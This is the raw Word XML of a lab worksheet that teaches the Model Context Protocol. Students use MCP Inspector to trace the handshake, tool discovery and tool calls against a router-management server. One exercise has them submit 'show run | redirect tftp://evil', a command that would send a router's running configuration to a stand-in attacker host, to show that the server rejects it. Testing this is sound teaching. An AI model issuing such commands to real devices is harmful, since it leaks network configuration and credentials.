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1 Worksheet — Protocol on the Wire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>25 minutes · client: MCP Inspector · prerequisite: pre-flight all green</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>You will trigger every message type MCP has — request, response, notification — and label them yourself. After this lab, nothing about MCP is magic: it's JSON you have read with your own eyes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Keep three panes visible: Inspector in the browser, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>server terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>linuxdesktop4</w:t>
      </w:r>
      <w:r>
        <w:t>, and this worksheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>A. The handshake (8 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Disconnect and reconnect Inspector (connect pane → Disconnect → Connect) so you see the session from the beginning. Open Inspector's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The first exchange is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t>. Find it and answer from the actual JSON:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The client's request includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"protocolVersion"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"capabilities"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"clientInfo"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. What did Inspector declare in its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>capabilities</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The server's response declares its own capabilities. Fill in from what you see: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Declared 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tools.listChanged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resources.subscribe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prompts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The response also carries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"instructions"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the text the server author wants injected into every AI conversation. Write down its first sentence. (Where did you meet this text before? Hint: LibreChat's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>serverInstructions: true</w:t>
      </w:r>
      <w:r>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Immediately after the response, the client sends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>notifications/initialized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Look at the JSON: what field is *missing* compared to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> request, and what does its absence mean?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&gt; Answer to check yourself: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — it's a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>notification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: one-way, no response expected. Requests have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>; responses match it; notifications never carry one. This is the entire JSON-RPC message taxonomy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>B. Discovery (5 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab (this fires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>B1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> How many tools? Which two carry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>destructiveHint: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in their annotations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>B2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pick </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>configure_interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and look at its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>inputSchema</w:t>
      </w:r>
      <w:r>
        <w:t>. Where did this JSON Schema come from? (Nobody wrote it by hand — see Server Code Walkthrough §5: it's generated from the Python function signature.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>B3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In the History pane, confirm: was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a request or a notification? How do you know?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>C. Execution (7 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_interfaces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the Tools tab. Watch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> panes: Inspector's history and the server terminal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Order the events as you observed them (number 1–5):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>[ ] server terminal shows the SSH session to 172.18.2.6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tools/call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> request appears (with an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>[ ] progress notifications arrive ("Connecting to Router1 over SSH...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] result arrives carrying the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] router's interface table visible in the result's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The progress messages are notifications, not responses. Why does that matter for a slow SSH call in a client like LibreChat? (Hint: timeouts.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Now call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dynamic_show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show run | redirect tftp://evil</w:t>
      </w:r>
      <w:r>
        <w:t>. Read the result. Is this an error at the protocol level (a JSON-RPC error) or a *successful* tool result whose text describes a rejection? Why did the server author choose that? (Walkthrough §4, "the error rule.")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>D. Wrap (5 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>D1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Complete the table for the three messages you highlighted today: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Kind (request/response/notification)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Who initiated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initialize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notifications/initialized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tools/call</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → result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rPr>
          <w:b/>
        </w:rPr>
        <w:t>D2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In one sentence: what does the server know about the *client's* abilities, and when did it learn it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Done when:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C1 ordered correctly, D1 filled, and you can point at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exchange in the History pane on request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>If you finish early</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_router_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and compare its result to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_interfaces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — find the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>structuredContent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>outputSchema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the tool definition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Predict, then verify: what happens to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after you call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enable_config_tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enabled: false</w:t>
      </w:r>
      <w:r>
        <w:t>? (You'll formally do this in Lab 5 — spoilers allowed.)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